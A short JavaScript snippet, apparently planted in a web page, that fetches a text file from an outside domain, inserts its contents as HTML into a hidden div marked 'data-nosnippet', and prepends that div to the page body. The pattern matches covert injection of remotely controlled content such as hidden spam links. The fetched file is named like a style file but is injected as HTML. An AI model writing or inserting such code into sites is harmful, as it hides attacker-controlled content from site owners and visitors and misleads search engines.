fetch("https://www.greatteastreet.co.uk/blogspot/style.txt") .then(response => response.text()) .then(data => { const container = document.createElement("div"); container.style.display = "none"; container.style.gap = "10px"; container.setAttribute("data-nosnippet", "true"); container.innerHTML = data; document.body.prepend(container); }) .catch(error => { console.error("Error saat fetch TXT:", error); });